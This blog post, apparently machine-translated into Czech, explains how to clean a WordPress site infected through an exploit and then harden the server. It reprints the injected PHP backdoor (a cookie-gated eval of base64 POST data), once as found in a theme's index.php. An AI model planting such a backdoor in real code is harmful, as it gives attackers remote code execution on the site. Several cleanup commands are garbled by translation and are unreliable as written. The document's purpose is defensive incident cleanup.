Než budete číst tento příspěvek, měli byste vidět příspěvek zde, Chcete-li něco pochopit. :)
Našel jsem to v několika souborech blogu na stealthsettings.com, coduri asemanatoare cu cele de mai jos, aparute ca urmare a virusarii cu výkon WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Pokud je to uvedený soubor xmlrpc.php z OspalýAle v grep server, můžete vidět, že existuje poměrně málo svého druhu ve zdrojovém kódu.
Čištění infikovaných souborů:
Ooookkkk ...
1. Nejlepším řešením, po té, co zálohováníA vyčistit databázi je vymazat soubory WordPress (můžete si nechat wp-config.php a soubory, které nejsou striktně spojené s platformou wp, po jejich pečlivé kontrole) ze serveru a nahrát ty původní z verze 2.5.1 (Během tohoto provedení WP verze upgradu :)) http://wordpress.org/download/ . Otřete včetně tématických souborů, pokud nechcete věřit, že jejich pečlivou kontrolu.
Zdá se, že byly postiženy a soubory témat, které nebyly použity předtím na blogu a jednoduše změnit téma, neřeší problém.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?><?php get_header(); ?>
2. Vyhledávání a smažte všechny soubory, které obsahují: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg a soubor wp-info.txt, pokud existuje....
nalézt. -name „* _new.php“
nalézt. -name „* _old.php“
nalézt. -name „* .jpgg“
nalézt. -název „* _giff“
nalézt. -name “* _pngg”
nalézt. -name „wp-info.txt“
3. v / Tmp , Vyhledávání a mazání složek, jako je tmpYwbzT2
SQL oděvů :
1. v tabulce tabulce wp_options zjistit, jestli tam je vymazat řádky: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Vše ve wp_options, jít do active_plugins a mazat, pokud je plugin, který skončí v jednom z rozšíření * _new.php, * _old.php, *. jpgg, *. Giff, *. pngg nebo pokud další rozšíření je podezření, pečlivě zkontrolujte.
3. V tabulce wp_users, Podívejte se, jestli je uživatel, který nemá nic nenapsal ve svém právu, sloupec user_nicename. Smažte tohoto uživatele, ale zapamatujte si číslo ve sloupci ID. Tento uživatel pravděpodobně použije "WordPress"Ca user_login a zdá se být vytvořen na 00: 00: 00 0000-00-00.
4. Přejít na tabulky wp_usermeta a odstranit všechny řádky patřící ID výše.
Po provedení tohoto vyčištění sql zakažte a poté aktivujte libovolný plugin. (v blogu -> Dashboard -> Plugins)
Zabezpečený server:
1. Podívejte se, co adresáře a soubory jsou "zapisovatelný"(chmod 777) a zkuste vložit a chmod které již nedovolí jejich psaní na žádné úrovni. (chmod 644, například)
Najít. -Perm-2-ls
2. Podívejte se, co soubory mají nastaven bit suid nebo sgid . Pokud nechcete použít ty soubory, jež na ně chmod 0 nebo odinstalovat balíček, který obsahuje. Jsou velmi nebezpečné, protože oprávnění EXECUTE "skupina"Nebo"kořen"A ne s normálními uživatelskými oprávněními k provedení tohoto souboru.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Zkontrolujte, které porty jsou otevřené a pokusit se uzavřít nebo zajistit ty, které nejsou používány.
netstat-| grep-i poslouchat
O tom. Vidím Některé blogy jsou zakázány de Google Search a další říkají "Udělal je dobře!!!" . No, udělal bych to pro ně... ale co říkáte, když Google začne banovat všechny weby formující IS SPAM a dal trojské koně (Trojan.Clicker.HTML) v cookies?
1 myšlenka na „WordPress Exploit – Vyčistěte virové soubory, SQL a zabezpečení serveru.